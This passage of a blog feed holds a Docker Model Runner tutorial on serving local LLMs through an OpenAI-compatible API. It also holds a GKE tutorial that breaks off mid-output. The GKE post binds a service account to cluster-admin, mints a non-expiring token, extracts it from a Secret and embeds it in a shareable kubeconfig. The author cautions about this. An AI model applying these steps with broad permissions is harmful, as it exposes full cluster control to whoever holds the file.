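<p>An empty list means those six boxes are ticked. Anything else is the list of items to go back and fix.</p>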
<hr />
<h2>Now Go Build Something</h2>
<p>Seven days ago, you did not know what a container was. Today, you can build one that is hardened enough to face the internet.</p>
<p>That is a real skill. Not a certificate. Not a badge. A skill - the kind that shows up when you push to production at 2 AM and everything works because you built it right the first time.</p>
<p>Docker is not the destination. It is the foundation. Everything that comes next - Kubernetes, service meshes, GitOps, platform engineering - is built on top of what you learned this week.</p>
<p>Now go build something amazing. And when you do, build it in a container.</p>
<hr />
<p><em>This concludes the</em> <em><strong>7 Days of Docker (2026)</strong></em> <em>series. If you enjoyed learning in a new way, then do follow me on</em> <a href="https://x.com/thesaloninarang"><em>X</em></a> <em>and connect with me on</em> <a href="https://www.linkedin.com/in/saloninarang/"><em>LinkedIn</em></a><em>.</em></p>
<p><em>Do share the articles and pointers you loved the most on socials and tag me.</em></p>
]]></content:encoded></item><item><title><![CDATA[Day 6: Run an LLM on Your Laptop - With Docker]]></title><description><![CDATA[7 Days of Docker (2026) - A Docker Captain's guide. Not your average tutorial.

I'm a Docker Captain. And if you'd told me two years ago that I'd be pulling AI models from Docker Hub the same way I pu]]></description><link>https://blog.kubesimplify.com/day-6-run-an-llm-on-your-laptop-with-docker</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-6-run-an-llm-on-your-laptop-with-docker</guid><category><![CDATA[Docker]]></category><category><![CDATA[AI]]></category><category><![CDATA[llm]]></category><category><![CDATA[docker model runner]]></category><category><![CDATA[MLX]]></category><category><![CDATA[openai]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Thu, 30 Apr 2026 15:38:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/9743edf7-b681-4237-a9ac-e0401077ceb5.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> - A Docker Captain's guide. Not your average tutorial.</p>
</blockquote>
<p>I'm a Docker Captain. And if you'd told me two years ago that I'd be pulling AI models from Docker Hub the same way I pull nginx, I would've laughed.</p>
<p>I'm not laughing anymore.</p>
<p>Docker shipped something called <strong>Model Runner</strong>. It lets you pull, run, and serve Large Language Models locally - no Python environment, no conda, no CUDA drivers, no dependency hell. One command. The model runs on your hardware with GPU acceleration. And it exposes an OpenAI-compatible API that any app can talk to.</p>
<p>Today we're going to pull a model, talk to it, build a real app that uses it, containerize that app, and deploy the whole thing with Compose. By the end of this post, you'll have a working AI-powered API running on your laptop. No cloud. No API keys. No monthly bill.</p>
<hr />
<h2>Pull a Model Like You Pull an Image</h2>
<pre><code class="language-bash">docker model pull ai/smollm2
</code></pre>
<pre><code class="language-console">Using cached model: 256.35 MiB
</code></pre>
<p>That's it. 256 megabytes. A small but capable language model, pulled from Docker Hub using the same infrastructure that serves container images. Same content-addressable storage, same caching.</p>
<p>Check what you have:</p>
<pre><code class="language-bash">docker model list
</code></pre>
<pre><code class="language-console">MODEL NAME  PARAMETERS  QUANTIZATION    ARCHITECTURE  MODEL ID      SIZE
smollm2     361.82 M    IQ2_XXS/Q4_K_M  llama         354bf30d0aa3  256.35 MiB
</code></pre>
<p>Look familiar? Same format as <code>docker images</code>. Model name, ID, size.</p>
<hr />
<h2>Talk to It</h2>
<pre><code class="language-bash">docker model run ai/smollm2 "What is Kubernetes in one sentence?"
</code></pre>
<pre><code class="language-console">Kubernetes is a container orchestration platform that automates the deployment,
scaling, and management of microservices-based applications.
</code></pre>
<p>That ran locally. On my Mac. With Metal GPU acceleration. No internet required after the initial pull.</p>
<p>Check the runner status:</p>
<pre><code class="language-bash">docker model status
</code></pre>
<pre><code class="language-console">Docker Model Runner is running
llama.cpp: running llama.cpp latest-metal e365e65
</code></pre>
<p><code>latest-metal</code> means it's using Apple Silicon GPU acceleration via Metal. On Linux with NVIDIA, you'd see a CUDA tag. Docker picks the right backend automatically.</p>
<p>Model Runner supports multiple inference backends:</p>
<table>
<thead>
<tr>
<th>Backend</th>
<th>Platform</th>
<th>Models</th>
</tr>
</thead>
<tbody><tr>
<td><strong>llama.cpp + Metal</strong></td>
<td>Mac (default)</td>
<td>GGUF models from Docker Hub (~340 tok/s)</td>
</tr>
<tr>
<td><strong>vllm-metal</strong></td>
<td>Mac (install required)</td>
<td>MLX models from Hugging Face (~275 tok/s)</td>
</tr>
<tr>
<td><strong>vLLM + CUDA</strong></td>
<td>Linux with NVIDIA GPU</td>
<td>Production inference</td>
</tr>
<tr>
<td><strong>Diffusers</strong></td>
<td>Linux/NVIDIA</td>
<td>Image generation (Stable Diffusion)</td>
</tr>
</tbody></table>
<h3>Want MLX models? Install vllm-metal</h3>
<p>llama.cpp + Metal is the default and handles GGUF models from Docker Hub. But if you want to run MLX models - Apple's native ML framework, designed for Apple Silicon's unified memory architecture - you can install the vllm-metal backend:</p>
<pre><code class="language-bash">docker model install-runner --backend vllm
</code></pre>
<pre><code class="language-console">Installing vllm backend...
vllm backend installed successfully
</code></pre>
<p>Check the status - both backends now running:</p>
<pre><code class="language-console">BACKEND    STATUS         DETAILS
llama.cpp  Running        llama.cpp latest-metal e365e65
vllm       Running        vllm-metal v0.1.0-20260320-122309
diffusers  Not Installed
mlx        Not Installed  package not installed
</code></pre>
<p>MLX models live on Hugging Face (not Docker Hub). Pull one:</p>
<pre><code class="language-bash">docker model pull hf.co/mlx-community/Llama-3.2-1B-Instruct-4bit
</code></pre>
<p>The same API (<code>localhost:12434/v1/</code>) serves both backends - Docker routes to the right one based on model format.</p>
<blockquote>
<p><strong>Watch out:</strong> You might see <code>docker model install-runner --backend mlx --gpu metal</code> suggested online or even by Gordon (Docker's AI assistant). On Docker Desktop, this fails with "Standalone installation not supported." The correct command is <code>--backend vllm</code>, which installs vllm-metal on Mac automatically. The <code>mlx</code> flag is for standalone Docker Engine only.</p>
</blockquote>
<p>Here's the same question hitting both backends on my M2 - same API, same endpoint, different models:</p>
<pre><code class="language-bash"># llama.cpp backend - SmolLM2 (362M params, GGUF from Docker Hub)
curl localhost:12434/v1/chat/completions \
  -d '{"model":"ai/smollm2", "messages":[{"role":"user","content":"What is a Docker container?"}]}'
</code></pre>
<pre><code class="language-console">"A Docker container is a lightweight, isolated, and self-contained runtime
environment that encapsulates an application and its dependencies."
74 tokens
</code></pre>
<pre><code class="language-bash"># vllm-metal backend - Llama 3.2 1B (1B params, MLX from Hugging Face)
curl localhost:12434/v1/chat/completions \
  -d '{"model":"hf.co/mlx-community/Llama-3.2-1B-Instruct-4bit", ...}'
</code></pre>
<pre><code class="language-console">"A Docker container is a lightweight, fully virtualized, and managed package
that performs a consistent version of an application, allowing it to be easily
deployed, scaled, and managed across multiple hosts and environments."
84 tokens
</code></pre>
<p>Two different models, two different backends, one API. Your app code doesn't change when you switch.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Model Runner doesn't run models inside containers. It runs them directly on your host hardware - Metal on Mac, CUDA on Linux. The llama.cpp process is a native binary on your host, not inside a container namespace. Why? Performance. LLMs need direct GPU access. Container isolation adds overhead. Docker's role here is distribution (pull from Hub) and API (OpenAI-compatible endpoint). The container is the app that CALLS the model, not the model itself.</p>
</blockquote>
<hr />
<h2>The API - This Changes Everything</h2>
<p>Model Runner exposes an OpenAI-compatible API. Two endpoints depending on where you're calling from:</p>
<table>
<thead>
<tr>
<th>Calling from...</th>
<th>URL</th>
</tr>
</thead>
<tbody><tr>
<td>Your Mac (terminal, Python, VS Code)</td>
<td><code>http://localhost:12434/v1/</code></td>
</tr>
<tr>
<td>Inside a Docker container</td>
<td><code>http://model-runner.docker.internal/v1/</code></td>
</tr>
</tbody></table>
<p>This is important. <code>model-runner.docker.internal</code> is Docker's internal DNS - it only resolves from inside containers. From your Mac, use <code>localhost:12434</code>.</p>
<p>Try it:</p>
<pre><code class="language-bash">curl http://localhost:12434/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "ai/smollm2",
    "messages": [{"role": "user", "content": "Explain Docker volumes in 2 sentences"}],
    "max_tokens": 60
  }'
</code></pre>
<pre><code class="language-json">{
  "choices": [{
    "message": {
      "role": "assistant",
      "content": "A Docker volume is a data container that allows you to mount a file system onto other files or directories. It enables you to use volumes as a source or destination for files within your Docker container, improving the portability and extensibility of your applications."
    }
  }],
  "usage": {
    "prompt_tokens": 37,
    "completion_tokens": 51,
    "total_tokens": 88
  }
}
</code></pre>
<p>That's the standard OpenAI chat completions format. Switch <code>localhost:12434</code> to <code>api.openai.com</code>, add an API key, swap the model name, and the same request hits GPT-4. Your code doesn't care which backend it talks to. Local model for dev, cloud for prod. Same interface.</p>
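<p>To make the "same interface" point concrete, here is a small sketch that builds the request for either backend using only the standard library. The <code>chat_request</code> helper, the <code>gpt-4</code> model name, and the placeholder key are illustrative assumptions. Nothing is sent until you pass the request to <code>urllib.request.urlopen</code>.</p>
<pre><code class="language-python">import json
import urllib.request


def chat_request(base_url, model, prompt, api_key=None, max_tokens=60):
    """Build (but do not send) an OpenAI-style chat completions request."""
    headers = {"Content-Type": "application/json"}
    if api_key:
        headers["Authorization"] = "Bearer " + api_key
    body = {
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
        "max_tokens": max_tokens,
    }
    return urllib.request.Request(
        base_url.rstrip("/") + "/chat/completions",
        data=json.dumps(body).encode("utf-8"),
        headers=headers,
        method="POST",
    )


# Local Model Runner: no key needed.
local = chat_request("http://localhost:12434/v1/", "ai/smollm2", "Explain Docker volumes")
# Hosted provider: same builder, different base URL, model name, and a placeholder key.
cloud = chat_request("https://api.openai.com/v1", "gpt-4", "Explain Docker volumes",
                     api_key="sk-placeholder")

print(local.full_url)  # http://localhost:12434/v1/chat/completions
print(cloud.full_url)  # https://api.openai.com/v1/chat/completions
</code></pre>
<p>Only three inputs differ between the two calls. The payload shape is identical.</p>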
<blockquote>
<p><strong>What Nobody Tells You:</strong> If <code>curl</code> fails with "Could not resolve host: model-runner.docker.internal" - you're running it from your Mac, not from inside a container. Use <code>localhost:12434</code> from the host. This trips up everyone the first time.</p>
</blockquote>
<hr />
<h2>Build a Real AI App</h2>
<p>Enough theory. Let's build an AI-powered API, containerize it, and serve it with Compose.</p>
<h3>The App (<code>app.py</code>)</h3>
<pre><code class="language-python">from flask import Flask, request, jsonify
from openai import OpenAI
import os

app = Flask(__name__)
client = OpenAI(
    base_url=os.environ.get("LLM_URL", "http://model-runner.docker.internal/v1/"),
    api_key="not-needed"
)

@app.route("/")
def home():
    return jsonify({"service": "AI Demo", "model": "smollm2"})

@app.route("/ask")
def ask():
    question = request.args.get("q", "What is Docker?")
    response = client.chat.completions.create(
        model="ai/smollm2",
        messages=[{"role": "user", "content": question}],
        max_tokens=100
    )
    return jsonify({
        "question": question,
        "answer": response.choices[0].message.content,
        "tokens": response.usage.total_tokens
    })

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
</code></pre>
<p>Notice <code>base_url</code> reads from an environment variable. From inside a container, it'll use the Docker internal hostname. The <code>api_key</code> is "not-needed" because Model Runner doesn't require auth.</p>
<h3>The Dockerfile</h3>
<pre><code class="language-dockerfile">FROM python:3.12-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY app.py .
EXPOSE 5000
CMD ["python", "app.py"]
</code></pre>
<h3>The requirements.txt</h3>
<pre><code class="language-plaintext">flask==3.1.1
openai==1.82.0
</code></pre>
<h3>compose.yaml</h3>
<pre><code class="language-yaml">services:
  ai-app:
    build: .
    ports:
      - "5002:5000"
    environment:
      - LLM_URL=http://model-runner.docker.internal/v1/
</code></pre>
<p>The <code>LLM_URL</code> environment variable tells the container to use the Docker-internal endpoint.</p>
<h3>Run It</h3>
<pre><code class="language-bash">docker compose up -d --build
</code></pre>
<pre><code class="language-console"> Image d6-ai-app-ai-app Built
 Network d6-ai-app_default Created
 Container d6-ai-app-ai-app-1 Started
</code></pre>
<h3>Test It</h3>
<pre><code class="language-bash">curl http://localhost:5002/
</code></pre>
<pre><code class="language-json">{"model": "smollm2", "service": "AI Demo"}
</code></pre>
<pre><code class="language-bash">curl "http://localhost:5002/ask?q=What+is+a+container+in+one+sentence"
</code></pre>
<pre><code class="language-json">{
  "answer": "A container is a lightweight package that runs applications and provides a controlled environment for the application's dependencies, allowing for easier deployment and scaling.",
  "question": "What is a container in one sentence",
  "tokens": 65
}
</code></pre>
<p>That's a containerized Flask app, calling a local LLM via Docker Model Runner, returning AI-generated answers. No cloud API. No API key. No monthly bill. Running on your laptop.</p>
<pre><code class="language-bash">docker compose down
</code></pre>
<hr />
<h2>What Else Is New - The Quick Version</h2>
<p>Model Runner is the headline, but Docker shipped more AI tooling in 2026:</p>
<p><strong>Gordon (</strong><code>docker ai</code><strong>)</strong> - Docker's built-in AI assistant. It reads your project - Dockerfiles, Compose files, running containers - and gives context-specific answers. Not generic ChatGPT. It sees your actual environment.</p>
<pre><code class="language-bash">docker ai "Why is my container using so much memory?"
</code></pre>
<p>Note: If you have many MCP servers configured, Gordon may error with "too many tools." Disable unused MCP servers in Docker Desktop settings to fix it.</p>
<p><strong>MCP Toolkit (</strong><code>docker mcp</code><strong>)</strong> - Model Context Protocol is a standard for connecting AI agents to tools. Docker runs MCP servers inside isolated containers with restricted permissions. Think of it as a security layer between AI agents and your system.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/2d0d09ac-9628-4bb0-8597-805e0e3951ee.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Docker Scout</strong> - Already covered in Day 2, but worth repeating: scan your AI app images too. AI dependencies (PyTorch, transformers, etc.) are massive and often carry CVEs.</p>
<p><strong>Docker Sandboxes</strong> - Run AI agents inside dedicated MicroVMs with their own kernel and private Docker daemon. Not containers - actual VM-grade isolation. Each agent session gets a disposable environment where it can clone repos, run tests, and build images without any path back to your host. Works with Claude Code, Codex, Copilot, and others. Install with <code>brew install docker/tap/sbx</code>.</p>
<p>Docker's AI story in 2026 goes well beyond "run containers." It's Model Runner for local inference, Gordon for context-aware assistance, MCP for secure tool access, Sandboxes for agent isolation, and Scout for supply chain security. All shipping today.</p>
<hr />
<h2>The Big Picture</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/45c6e62f-1735-42e9-979b-27d869837c05.png" alt="" style="display:block;margin:0 auto" />

<p>Docker in 2026 is two things:</p>
<ol>
<li><p><strong>A container platform</strong> (Days 1-5) - build, ship, run applications</p>
</li>
<li><p><strong>An AI development platform</strong> (Day 6) - pull models, run local inference, build AI apps</p>
</li>
</ol>
<p>The second part is new. And it's growing fast. Docker Hub already hosts Llama, Mistral, Phi, Gemma, SmolLM, and others in GGUF format with various quantization levels.</p>
<p>The OpenAI-compatible API is the killer feature. Write your app against the OpenAI interface. During development, point it at <code>localhost:12434</code> - free, fast, private. In production, swap to the real OpenAI API or any other compatible provider. Your code doesn't change.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/9d025369-4a8f-45b5-8904-0e9f2c1ad8dd.png" alt="" style="display:block;margin:0 auto" />
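<p>As a rough illustration of that swap, here is a minimal Python sketch using only the standard library. The <code>LLM_BASE_URL</code> variable and the <code>build_chat_request</code> / <code>ask</code> helpers are hypothetical names, and the <code>/v1/chat/completions</code> path is taken from the Quick Reference in this post; adjust it if your Model Runner version exposes a different prefix.</p>
<pre><code class="language-python">import json
import os
import urllib.request

# Assumption: the Model Runner address from this post; override via LLM_BASE_URL.
DEFAULT_BASE_URL = "http://localhost:12434/v1"


def build_chat_request(question, base_url=None, model="ai/smollm2", api_key=None):
    """Build an OpenAI-style chat completions request without sending it."""
    base = (base_url or os.environ.get("LLM_BASE_URL", DEFAULT_BASE_URL)).rstrip("/")
    payload = {
        "model": model,
        "messages": [{"role": "user", "content": question}],
    }
    headers = {"Content-Type": "application/json"}
    if api_key:
        # Hosted providers expect a bearer key; the local runner needs none.
        headers["Authorization"] = "Bearer " + api_key
    return urllib.request.Request(
        base + "/chat/completions",
        data=json.dumps(payload).encode("utf-8"),
        headers=headers,
        method="POST",
    )


def ask(question, **kwargs):
    """Send the request and return the first choice's text."""
    with urllib.request.urlopen(build_chat_request(question, **kwargs), timeout=60) as resp:
        body = json.load(resp)
    return body["choices"][0]["message"]["content"]
</code></pre>
<p>Only <code>base_url</code>, <code>model</code>, and <code>api_key</code> change between local development and a hosted provider; the request shape stays the same.</p>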

<hr />
<h2>Quick Reference</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What It Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker model pull ai/smollm2</code></td>
<td>Pull a model from Docker Hub</td>
</tr>
<tr>
<td><code>docker model run ai/smollm2 "prompt"</code></td>
<td>Chat with a model</td>
</tr>
<tr>
<td><code>docker model list</code></td>
<td>List downloaded models</td>
</tr>
<tr>
<td><code>docker model status</code></td>
<td>Check runner status and backend</td>
</tr>
<tr>
<td><code>docker model rm ai/smollm2</code></td>
<td>Remove a model</td>
</tr>
<tr>
<td><code>docker ai "question"</code></td>
<td>Ask Gordon (context-aware)</td>
</tr>
<tr>
<td><code>docker mcp --version</code></td>
<td>Check MCP Toolkit version</td>
</tr>
<tr>
<td><code>curl localhost:12434/v1/models</code></td>
<td>List models via API (from host)</td>
</tr>
<tr>
<td><code>curl localhost:12434/v1/chat/completions</code></td>
<td>Chat completions API (from host)</td>
</tr>
</tbody></table>
<hr />
<h2>Tomorrow: Day 7</h2>
<p>You just built an AI-powered app with Docker. From <code>docker model pull</code> to a working API in minutes.</p>
<p>Tomorrow is the finale. <strong>Day 7: Ship It.</strong> We take everything from the past 6 days and make it production-ready. Non-root users. Read-only filesystems. Resource limits. Security scanning. The checklist that separates side projects from production systems.</p>
]]></content:encoded></item><item><title><![CDATA[A Kubeconfig for GKE That Doesn't Need gcloud]]></title><description><![CDATA[When you run gcloud container clusters get-credentials, the kubeconfig it writes looks innocent — until you hand it to a teammate and they hit:
error: exec plugin: invalid apiVersion "client.authentication.k8s.io/v1beta1"
…or the classic gke-gcloud-a...]]></description><link>https://blog.kubesimplify.com/a-kubeconfig-for-gke-that-doesnt-need-gcloud</link><guid isPermaLink="true">https://blog.kubesimplify.com/a-kubeconfig-for-gke-that-doesnt-need-gcloud</guid><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Wed, 29 Apr 2026 05:56:22 GMT</pubDate><enclosure url="https://cloudmate-test.s3.us-east-1.amazonaws.com/res%2Fhashnode%2Fimage%2Fupload%2Fv1777443605504%2F64d466df-ca7e-4b49-b46d-a2c3177667b6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>When you run <code>gcloud container clusters get-credentials</code>, the kubeconfig it writes looks innocent — until you hand it to a teammate and they hit:</p>
<pre><code>error: exec plugin: invalid apiVersion <span class="hljs-string">"client.authentication.k8s.io/v1beta1"</span>
</code></pre><p>…or the classic <code>gke-gcloud-auth-plugin: executable not found</code>.</p>
<p>That's because the generated kubeconfig doesn't actually contain a credential. It contains an <code>exec:</code> block that shells out to <code>gke-gcloud-auth-plugin</code>, which in turn relies on your <code>gcloud</code> credentials to supply a valid OAuth token whenever kubectl needs one. If you look at the <code>users</code> section of a stock GKE kubeconfig, this is what's in there:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">gke_saiyam-project_us-east1-b_demo-test</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">exec:</span>
      <span class="hljs-attr">apiVersion:</span> <span class="hljs-string">client.authentication.k8s.io/v1beta1</span>
      <span class="hljs-attr">command:</span> <span class="hljs-string">gke-gcloud-auth-plugin</span>
      <span class="hljs-attr">installHint:</span> <span class="hljs-string">Install</span> <span class="hljs-string">gke-gcloud-auth-plugin</span> <span class="hljs-string">for</span> <span class="hljs-string">use</span> <span class="hljs-string">with</span> <span class="hljs-string">kubectl</span> <span class="hljs-string">by</span> <span class="hljs-string">following</span>
        <span class="hljs-string">https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#install_plugin</span>
      <span class="hljs-attr">interactiveMode:</span> <span class="hljs-string">IfAvailable</span>
      <span class="hljs-attr">provideClusterInfo:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>No token. No cert. Just "run this plugin and ask it for auth." No gcloud on the machine, no access.</p>
<p>If you want a kubeconfig that <em>anyone</em> can use — a CI runner, a contractor's laptop, a script on a VM — you need to swap that exec-plugin auth for something self-contained. The cleanest answer: a Kubernetes ServiceAccount and a bearer token.</p>
<p>Here's the full flow, run end-to-end against a live GKE cluster.</p>
<h2 id="heading-the-mental-model">The mental model</h2>
<p>Four pieces, in order:</p>
<ol>
<li><strong>Identity</strong> — a ServiceAccount in the cluster</li>
<li><strong>Permissions</strong> — a (Cluster)RoleBinding attaching a role to that SA</li>
<li><strong>Credential</strong> — a token the SA can present to the API server</li>
<li><strong>Portable config</strong> — a kubeconfig file wrapping the token + cluster endpoint + CA cert</li>
</ol>
<p>The API server validates the token itself. No Google, no gcloud, no OAuth round-trip.</p>
<h2 id="heading-step-1-identity-and-permissions">Step 1: Identity and permissions</h2>
<pre><code class="lang-bash">kubectl create serviceaccount shared-access -n kube-system

kubectl create clusterrolebinding shared-access-binding \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:shared-access
</code></pre>
<p>Output:</p>
<pre><code>serviceaccount/shared-access created
clusterrolebinding.rbac.authorization.k8s.io/shared-access-binding created
</code></pre><p>Two things worth calling out:</p>
<ul>
<li>The SA lives in <code>kube-system</code> because it's a cluster-wide utility identity. The namespace doesn't restrict its access — RBAC does.</li>
<li><code>cluster-admin</code> is <code>*</code> on <code>*</code>. Scope it down in production. <code>view</code>, <code>edit</code>, or a custom ClusterRole are usually what you actually want. If you only need namespace-scoped access, use a <code>RoleBinding</code> in that namespace instead of a <code>ClusterRoleBinding</code>.</li>
</ul>
<h2 id="heading-step-2-mint-a-long-lived-token">Step 2: Mint a long-lived token</h2>
<p>Before Kubernetes 1.24, creating a ServiceAccount automatically created a companion Secret with a non-expiring token. That was removed — long-lived bearer tokens are a security footgun — so now you opt in explicitly:</p>
<pre><code class="lang-bash">kubectl apply -f - &lt;&lt;<span class="hljs-string">'EOF'</span>
apiVersion: v1
kind: Secret
metadata:
  name: shared-access-token
  namespace: kube-system
  annotations:
    kubernetes.io/service-account.name: shared-access
<span class="hljs-built_in">type</span>: kubernetes.io/service-account-token
EOF
</code></pre>
<p>Output:</p>
<pre><code>secret/shared-access-token created
</code></pre><p>The magic is in two fields:</p>
<ul>
<li><strong><code>type: kubernetes.io/service-account-token</code></strong> — tells the token controller (built into <code>kube-controller-manager</code>) "I'm a Secret you should populate."</li>
<li><strong><code>kubernetes.io/service-account.name</code> annotation</strong> — tells it <em>which</em> ServiceAccount's identity to embed in the token.</li>
</ul>
<p>Wait a couple of seconds, then inspect the Secret — the controller has filled in the data for you:</p>
<pre><code class="lang-bash">kubectl get secret shared-access-token -n kube-system -o yaml
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">data:</span>
  <span class="hljs-attr">ca.crt:</span> <span class="hljs-string">LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMVENDQXBXZ0F3SUJB...</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">a3ViZS1zeXN0ZW0=</span>
  <span class="hljs-attr">token:</span> <span class="hljs-string">ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklrWnNZMkk0VFRkWmFrVjN...</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Secret</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">annotations:</span>
    <span class="hljs-attr">kubernetes.io/service-account.name:</span> <span class="hljs-string">shared-access</span>
    <span class="hljs-attr">kubernetes.io/service-account.uid:</span> <span class="hljs-string">9e8d4bdb-46ea-4893-9306-d56bea6aa304</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">shared-access-token</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kube-system</span>
<span class="hljs-attr">type:</span> <span class="hljs-string">kubernetes.io/service-account-token</span>
</code></pre>
<p>Three fields got populated by the controller:</p>
<ul>
<li><code>.data.token</code> — a signed JWT, the actual bearer credential</li>
<li><code>.data.ca.crt</code> — the cluster's CA certificate (so your client can trust the API server's TLS)</li>
<li><code>.data.namespace</code> — the SA's namespace</li>
</ul>
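<p>To see what the token actually carries, you can decode its payload locally. This is a minimal sketch, assuming the token is a standard three-part JWT; <code>decode_jwt_claims</code> is a hypothetical helper, and it only reads the claims, it does not verify the signature (the API server does that).</p>
<pre><code class="lang-python">import base64
import json


def decode_jwt_claims(token):
    """Return the unverified claims of a JWT as a dict."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    payload = parts[1]
    # JWT segments are base64url without padding; restore it before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))
</code></pre>
<p>Run against the decoded <code>.data.token</code> value, the <code>sub</code> claim should read <code>system:serviceaccount:kube-system:shared-access</code>, which is the identity the API server will see.</p>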
<blockquote>
<p>If you'd rather have a short-lived token, skip the Secret and run <code>kubectl create token shared-access -n kube-system --duration=24h</code>. Good for automation that rotates. Bad for a "hand someone a file" use case, which is what we're doing here.</p>
</blockquote>
<h2 id="heading-step-3-extract-the-three-things-a-kubeconfig-needs">Step 3: Extract the three things a kubeconfig needs</h2>
<pre><code class="lang-bash">SERVER=$(kubectl config view --minify -o jsonpath=<span class="hljs-string">'{.clusters[0].cluster.server}'</span>)
CA=$(kubectl get secret shared-access-token -n kube-system -o jsonpath=<span class="hljs-string">'{.data.ca\.crt}'</span>)
TOKEN=$(kubectl get secret shared-access-token -n kube-system -o jsonpath=<span class="hljs-string">'{.data.token}'</span> | base64 -d)

<span class="hljs-built_in">echo</span> <span class="hljs-string">"SERVER = <span class="hljs-variable">${SERVER}</span>"</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"CA     = <span class="hljs-variable">${CA:0:60}</span>..."</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"TOKEN  = <span class="hljs-variable">${TOKEN:0:40}</span>..."</span>
</code></pre>
<p>Output:</p>
<pre><code>SERVER = https:<span class="hljs-comment">//35.196.129.174</span>
CA     = LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMVENDQXBXZ0F3SUJB...
TOKEN  = eyJhbGciOiJSUzI1NiIsImtpZCI6IkZsY2I4TTdZ...
</code></pre><ul>
<li><code>SERVER</code> — the GKE API endpoint, pulled straight from your current context</li>
<li><code>CA</code> — already base64, drops straight into the kubeconfig as-is</li>
<li><code>TOKEN</code> — we decode it because kubeconfig wants the raw JWT string, not base64</li>
</ul>
<h2 id="heading-step-4-assemble-the-kubeconfig">Step 4: Assemble the kubeconfig</h2>
<pre><code class="lang-bash">cat &gt; /tmp/shared-kubeconfig.yaml &lt;&lt;EOF
apiVersion: v1
kind: Config
clusters:
- name: cluster-1
  cluster:
    server: <span class="hljs-variable">${SERVER}</span>
    certificate-authority-data: <span class="hljs-variable">${CA}</span>
contexts:
- name: cluster-1
  context:
    cluster: cluster-1
    user: shared-access
current-context: cluster-1
users:
- name: shared-access
  user:
    token: <span class="hljs-variable">${TOKEN}</span>
EOF
</code></pre>
<p>A kubeconfig is three independent lists — <code>clusters</code>, <code>users</code>, <code>contexts</code> — glued together by a <code>context</code> that names one cluster + one user. Nothing more.</p>
<p>Notice what's <em>not</em> in the <code>users</code> block: no <code>auth-provider</code>, no <code>exec</code>. kubectl has nothing to shell out to. It just sends <code>Authorization: Bearer &lt;token&gt;</code> on every request and the API server validates the JWT.</p>
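<p>The same assembly can be sketched in Python if you would rather script it. Because YAML is a superset of JSON, a kubeconfig written as JSON is generally readable by kubectl as well. <code>build_kubeconfig</code> and <code>write_kubeconfig</code> are hypothetical helpers, and the default names simply mirror the heredoc above.</p>
<pre><code class="lang-python">import json
import os


def build_kubeconfig(server, ca_b64, token, name="cluster-1", user="shared-access"):
    """Assemble a token-based kubeconfig as a plain dict."""
    return {
        "apiVersion": "v1",
        "kind": "Config",
        "clusters": [
            {"name": name, "cluster": {"server": server, "certificate-authority-data": ca_b64}}
        ],
        "users": [{"name": user, "user": {"token": token}}],
        # The context is the glue: it names one cluster and one user.
        "contexts": [{"name": name, "context": {"cluster": name, "user": user}}],
        "current-context": name,
    }


def write_kubeconfig(path, config):
    """Write the config as JSON with owner-only permissions (it is a credential)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as handle:
        json.dump(config, handle, indent=2)
</code></pre>
<p>Pass in the same <code>SERVER</code>, <code>CA</code>, and <code>TOKEN</code> values extracted in Step 3; the CA stays base64-encoded and the token is the raw JWT.</p>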
<h2 id="heading-step-5-prove-it-works-without-gcloud">Step 5: Prove it works without gcloud</h2>
<pre><code class="lang-bash">KUBECONFIG=/tmp/shared-kubeconfig.yaml kubectl get nodes
KUBECONFIG=/tmp/shared-kubeconfig.yaml kubectl auth whoami
KUBECONFIG=/tmp/shared-kubeconfig.yaml kubectl auth can-i <span class="hljs-string">'*'</span> <span class="hljs-string">'*'</span> --all-namespaces
</code></pre>
<p>Output:</p>
<pre><code>NAME                                       STATUS   ROLES    AGE   VERSION
